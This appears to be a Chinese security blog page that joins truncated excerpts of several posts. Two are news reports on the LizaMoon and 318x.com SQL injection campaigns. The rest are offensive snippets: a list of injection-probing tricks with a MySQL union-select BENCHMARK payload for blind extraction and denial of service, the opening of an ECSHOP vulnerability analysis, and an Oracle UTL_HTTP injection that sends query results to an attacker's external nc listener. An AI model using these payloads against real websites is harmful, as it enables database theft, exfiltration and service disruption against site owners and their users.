FROM:游侠
最近McAfee.com,MySql.com和Sun.com接连被黑,被黑的根源则在于SQL注入攻击。这个呈下降趋势的攻击方式,重新成为业内人士的焦点。
资安厂商Websense在3月29日发布了一则消息,一个被命名为LizaMoon的(SQL Injection)SQL注入攻击正在席卷全球,已有许多网站遭受攻击,网页内容中被塞了lizamoon字串,疑似挂马连结,透过Google查询lizamoon. com关键词,被稙入恶意连结的URL数在两天内由28,000个急速增加到380,000个(2011/03/31 22:00 UTC+8时的资料),甚至iTune网站也名列其中。
不过,依据分析iTune中出现的恶意连结已被采取措施,不至产生危害,但这波攻击只花了短短几天就污染了超过38万个网址(以URL计,非网站数),而且开始注入出现lizamoon以外的域名的Script连结网址。
目前网络上找到的数据尚少,无从推断太多攻击细节,但数据显示,透过防火墙封锁lizamoon. com也无法杜绝使用者误连恶意网站从而“中标”的可能。
西瓜注:此类问题已经出现,敬请关注。
据国外媒体报道,据互联网安全和监视公司ScanSaf说,从11月末开始出现的一种新的和非常复杂的SQL注入攻击已经感染了12.5万过个网站。感染网站的木马程序将收集用户的信用卡号码和其它银行信息。
据介绍,注入的iframe装载来自318x.com网站的第一阶段的恶意代码。然后,用户看不见的一系列iframe和代码重新定向将悄悄地在用户系统中安装来自windowssp.7766.org网站的攻击代码Backdoor.Win32.Buzus.croo。
阅读全文
From: Kindle
1、加引号’这个最常用
2、变参数类型,比如把id=1改为id=a等 有时很有效果
3、乱添数据,比如把id=1改为id=1111111111111111111111……等 有时很有效果
4、text.php?aa[]=xx
5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试.
6、benchmark( 999999999999999999, md5( ‘test’ ) )
BENCHMARK(count,expr):BENCHMARK()函数重复countTimes次执行表达式expr,它可以用于计时MySQL处理表达式有多快。结果值总是0。
id=1 union select 1,benchmark(500000,md5(‘test’)),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
利用找个函数可以作拒绝服务攻击!!http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0×41)),不过前提还是要求可以注射。
影响版本:
ECSHOP 2.6.1/2.6.2
程序介绍:
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。
漏洞分析:
文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep():
阅读全文
作者:Kindle
MSN :Kindle@live.cn
Blog:http://hi.baidu.com/system_exp
Team:反安全技术小组 (http://bbs.exploits.com.cn)
首先外网nc监听对应的端口
url语句简单如下所示:
http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request(‘外网ip:port/’||(sql语句))=1–
内容如下:
阅读全文
